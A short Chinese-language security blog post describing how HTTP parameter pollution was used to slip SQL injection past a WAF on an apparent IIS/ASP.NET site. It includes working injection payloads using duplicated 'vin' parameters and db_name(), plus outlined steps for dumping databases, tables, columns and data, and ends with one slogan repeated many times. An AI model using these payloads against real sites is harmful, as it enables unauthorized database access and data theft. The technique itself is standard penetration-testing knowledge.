实操：一次简单的HPP绕WAF

文章来源：Khan安全攻防实验室 一次简单的HPP绕WAF 利用代码中的一段错误，导致我们可以利用hpp来完全绕过防御规则。 WAF绕过中，对规则与正则的绕过总是有局限性的。 直接操作 单引号报错：   闭合一波： 直接被干掉…… 仔细看了下第一包的响应：asp.net，基本锁定IIS+ASP.NET，此时hpp不香吗 结合报错回显，直接构造payload： vin=11111111111111')&vin=and+1=db_name()--+- 参数连接时用了逗号，将payload简单修改下： vin=11111111111111&vin=')+and+1=db_name()--+- 也可以直接用注释符包含： 依次注出其它库： 注表，通过not in语句： 利用having 1=1和group by注字段： 注数据：         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。         学好技术，别再让WAF拦住你脚步。